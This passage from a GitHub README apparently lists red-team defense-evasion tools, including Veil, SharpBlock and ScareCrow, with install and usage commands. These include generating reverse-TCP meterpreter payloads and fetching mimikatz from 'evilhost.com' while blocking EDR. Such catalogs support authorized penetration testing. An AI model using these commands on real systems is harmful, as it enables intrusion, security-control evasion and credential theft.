href="https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4"><img src="https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/AlessandroZ/BeRoot">https://github.com/AlessandroZ/BeRoot</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Defense Evasion</h1><a id="user-content-defense-evasion" class="anchor" aria-label="Permalink: Defense Evasion" href="#defense-evasion"><svg 
class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/danielbohannon/Invoke-Obfuscation">Invoke-Obfuscation</a></h3><a id="user-content-invoke-obfuscation" class="anchor" aria-label="Permalink: 🔙Invoke-Obfuscation" href="#invoke-obfuscation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A PowerShell v2.0+ compatible PowerShell command and script obfuscator. 
If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/danielbohannon/Invoke-Obfuscation.git"><pre>git clone https://github.com/danielbohannon/Invoke-Obfuscation.git</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./Invoke-Obfuscation"><pre>./Invoke-Obfuscation</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png"><img src="https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Veil-Framework/Veil">Veil</a></h3><a id="user-content-veil" class="anchor" aria-label="Permalink: 🔙Veil" href="#veil"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Veil is a tool for 
generating metasploit payloads that bypass common anti-virus solutions.</p> <p dir="auto">It can be used to generate obfuscated shellcode, see the official <a href="https://www.veil-framework.com/" rel="nofollow">veil framework blog</a> for more info.</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="apt -y install veil /usr/share/veil/config/setup.sh --force --silent"><pre>apt -y install veil /usr/share/veil/config/setup.sh --force --silent</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent"><pre>sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git <span class="pl-c1">cd</span> Veil/ ./config/setup.sh --force --silent</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-payloads # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-encoders # Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234 ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 # List all payloads (–list-payloads) for the tool Evasion (-t Evasion) ./Veil.py -t Evasion --list-payloads # Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris"><pre><span 
class="pl-c"><span class="pl-c">#</span> List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)</span> ./Veil.py -t Ordnance --list-payloads <span class="pl-c"><span class="pl-c">#</span> List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)</span> ./Veil.py -t Ordnance --list-encoders <span class="pl-c"><span class="pl-c">#</span> Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234</span> ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 <span class="pl-c"><span class="pl-c">#</span> List all payloads (–list-payloads) for the tool Evasion (-t Evasion)</span> ./Veil.py -t Evasion --list-payloads <span class="pl-c"><span class="pl-c">#</span> Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris</span> ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris</pre></div> <p dir="auto">Veil creators wrote a nice <a href="https://www.veil-framework.com/veil-command-line-usage/" rel="nofollow">blog post</a> explaining further ordnance and evasion command line usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png"><img src="https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/CCob/SharpBlock">SharpBlock</a></h3><a id="user-content-sharpblock" class="anchor" aria-label="Permalink: 🔙SharpBlock" href="#sharpblock"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 
1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A method of bypassing EDR active protection DLLs by preventing entry point execution.</p> <p dir="auto"><strong>Features:</strong></p> <ul dir="auto"> <li>Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.</li> <li>Patchless AMSI bypass that is undetectable by scanners looking for Amsi.dll code patches at runtime.</li> <li>Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).</li> <li>Implanted process is hidden to help evade scanners looking for hollowed processes.</li> <li>Command line args are spoofed and implanted after process creation using a stealthy EDR detection method.</li> <li>Patchless ETW bypass.</li> <li>Blocks NtProtectVirtualMemory invocation when the callee is within the range of a blocked DLL's address space.</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Use <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a> to compile the SharpBlock binary.</p> <p dir="auto">Open the SharpBlock <a href="https://github.com/CCob/SharpBlock">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL SharpBlock -e http://evilhost.com/mimikatz.bin -s 
c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee # Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi"><pre><span class="pl-c"><span class="pl-c">#</span> Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL</span> SharpBlock -e http://evilhost.com/mimikatz.bin -s c:<span class="pl-cce">\w</span>indows<span class="pl-cce">\s</span>ystem32<span class="pl-cce">\n</span>otepad.exe -d <span class="pl-s"><span class="pl-pds">"</span>Active Protection DLL for SylantStrike<span class="pl-pds">"</span></span> -a coffee <span class="pl-c"><span class="pl-c">#</span> Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL</span> execute-assembly SharpBlock.exe -e <span class="pl-cce">\\</span>.<span class="pl-cce">\p</span>ipe<span class="pl-cce">\m</span>imi -s c:<span class="pl-cce">\w</span>indows<span class="pl-cce">\s</span>ystem32<span class="pl-cce">\n</span>otepad.exe -d <span class="pl-s"><span class="pl-pds">"</span>Active Protection DLL for SylantStrike<span class="pl-pds">"</span></span> -a coffee upload_file /home/haxor/mimikatz.exe <span class="pl-cce">\\</span>.<span class="pl-cce">\p</span>ipe<span class="pl-cce">\m</span>imi</pre></div> <p dir="auto">Nice PenTestPartners blog post <a href="https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png"><img 
src="https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://youtu.be/0W9wkamknfM" rel="nofollow">https://youtu.be/0W9wkamknfM</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/weak1337/Alcatraz">Alcatraz</a></h3><a id="user-content-alcatraz" class="anchor" aria-label="Permalink: 🔙Alcatraz" href="#alcatraz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Alcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:</p> <ul dir="auto"> <li>.exe</li> <li>.dll</li> <li>.sys</li> </ul> <p dir="auto">Some supported obfuscation features include:</p> <ul dir="auto"> <li>Obfuscation of immediate moves</li> <li>Control flow flattening</li> <li>ADD mutation</li> <li>Entry-point obfuscation</li> <li>Lea obfuscation</li> </ul> <p dir="auto"><strong>Install: (Requirements)</strong></p> <p dir="auto">Install: <a href="https://vcpkg.io/en/getting-started.html" rel="nofollow">https://vcpkg.io/en/getting-started.html</a></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="vcpkg.exe 
install asmjit:x64-windows vcpkg.exe install zydis:x64-windows"><pre>vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows</pre></div> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Using the GUI to obfuscate a binary:</p> <ol dir="auto"> <li>Load a binary by clicking <code>file</code> in the top left corner.</li> <li>Add functions by expanding the <code>Functions</code> tree. (You can search by putting in the name in the searchbar at the top)</li> <li>Hit <code>compile</code> (<strong>Note:</strong> <em>Obfuscating lots of functions might take some seconds</em>)</li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png"><img src="https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/weak1337/Alcatraz">https://github.com/weak1337/Alcatraz</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/Mangle">Mangle</a></h3><a id="user-content-mangle" class="anchor" aria-label="Permalink: 🔙Mangle" href="#mangle"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z"></path></svg></a></div> <p dir="auto">Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL).</p> <p dir="auto">Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.</p> <p dir="auto">In doing so, Mangle helps loaders evade on-disk and in-memory scanners.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="go get github.com/Binject/debug/pe"><pre class="notranslate"><code>go get github.com/Binject/debug/pe </code></pre></div> <p dir="auto">Then build it</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go"><pre class="notranslate"><code>git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" -C string Path to the file containing the certificate you want to clone -I string Path to the orginal file -M Edit the PE file to strip out Go indicators -O string The new file name -S int How many MBs to increase the file by"><pre> -C string Path to the file containing the certificate you want to clone -I string Path to the orginal file -M Edit the PE file to strip out Go indicators -O string The new file name -S int How many MBs to increase the file by</pre></div> <p dir="auto">Full usage information can be found <a 
href="https://github.com/optiv/Mangle#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png"><img src="https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/optiv/Mangle">https://github.com/optiv/Mangle</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="http://amsi.fail/" rel="nofollow">AMSI Fail</a></h3><a id="user-content-amsi-fail" class="anchor" aria-label="Permalink: 🔙AMSI Fail" href="#amsi-fail"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">AMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.</p> <p dir="auto">The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. 
Every snippet is obfuscated at runtime/request so that no two generated outputs share the same signature.</p> <p dir="auto">Nice F-Secure blog post explaining AMSI <a href="https://blog.f-secure.com/hunting-for-amsi-bypasses/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png"><img src="https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="http://amsi.fail/" rel="nofollow">http://amsi.fail/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/ScareCrow">ScareCrow</a></h3><a id="user-content-scarecrow" class="anchor" aria-label="Permalink: 🔙ScareCrow" href="#scarecrow"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">ScareCrow is a payload creation framework for side-loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls).</p> <p dir="auto">Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hooks out of the system DLLs running in the process's memory.</p> <p dir="auto">When 
executed, ScareCrow will copy the bytes of the system DLLs stored on disk in <code>C:\Windows\System32\</code>. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDRs only hook these processes in memory, the on-disk copies remain unaltered.</p> <p dir="auto">Useful blog posts for learning about the techniques utilized by ScareCrow:</p> <ul dir="auto"> <li><a href="https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved" rel="nofollow">Endpoint Detection and Response: How Hackers Have Evolved</a></li> <li><a href="https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught" rel="nofollow">EDR and Blending In: How Attackers Avoid Getting Caught</a></li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto"><em>ScareCrow requires Go 1.16.1 or later to compile loaders.</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Clone git clone https://github.com/optiv/ScareCrow cd ScareCrow # Install dependencies go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo # Required openssl osslsigncode mingw-w64 # Build go build ScareCrow.go"><pre><span class="pl-c"><span class="pl-c">#</span> Clone</span> git clone https://github.com/optiv/ScareCrow <span class="pl-c1">cd</span> ScareCrow <span class="pl-c"><span class="pl-c">#</span> Install dependencies</span> go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo <span class="pl-c"><span class="pl-c">#</span> Required</span> openssl osslsigncode mingw-w64 <span class="pl-c"><span class="pl-c">#</span> Build</span> go build ScareCrow.go</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content 
notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage of ./ScareCrow: -I string Path to the raw 64-bit shellcode. -Loader string Sets the type of process that will sideload the malicious payload: [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. ..."><pre class="notranslate"><code>Usage of ./ScareCrow: -I string Path to the raw 64-bit shellcode. -Loader string Sets the type of process that will sideload the malicious payload: [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. 
[*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. ... </code></pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/optiv/ScareCrow#loader">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png"><img src="https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/optiv/ScareCrow">https://github.com/optiv/ScareCrow</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mufeedvh/moonwalk">moonwalk</a></h3><a id="user-content-moonwalk" class="anchor" aria-label="Permalink: 🔙moonwalk" href="#moonwalk"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 